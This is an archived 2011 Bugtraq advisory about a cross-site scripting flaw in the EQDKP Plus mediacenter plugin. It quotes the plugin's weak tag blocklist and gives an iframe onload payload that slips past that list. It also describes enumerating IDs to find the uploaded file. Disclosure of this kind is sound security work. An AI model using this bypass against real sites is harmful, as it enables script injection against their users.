lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BANLkTikNYBhKS7VMb1G6i+FcAKMvJjhpSQ@mail.gmail.com>
Date: Fri, 17 Jun 2011 06:59:49 +0400
From: "iPower N/A" <vb.win32@...il.com>
To: bugtraq@...urityfocus.com
Subject: EQDKP plus Cross Site Scripting and Bypass file extension


Hello!

I have found a vulnerability in the EQDKP Plus.
More precisely in the plugin mediacenter.

Because of incorrectly checks the file extension
it is possible to upload the "htm" file and execute
XSS attack.

But with some restrictions. The plugin checks the contents for tags:

[code=plugins/mediacenter/include/mediacenter.class.php:421]
function check_content($fieldname){
		
$disallowed = "body|head|html|img|plaintext|a href|pre|script|table|title|php";
$disallowed_content = explode('|', $disallowed);
if (empty($disallowed_content))
	{
		return false;
}
[/code]

To get around this, you can use the Next design:
[code]
<iframe src="http://yandex.ru" style="display: none" onload="alert('XSS')">
</iframe>
[/code]

After downloading the file to the server, you can find the file on request:
http://site.com/dkp/plugins/mediacenter/index.php?mode=ajax&id = [ID].
[ID] - simple exhaustive search.

Example:
http://www.eqdkp-plus.com/demo06/data/d2c0752ce264405a0555a3825c2494f2/mediacenter/thumbs_b/ee5bb2c59c237307d61bcb0bae1e08f2.htm

Vulnerable versions: <=0.6.4.5

P.S.
 Sorry for my bad english. :)

 Best Regards,
 iPower.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ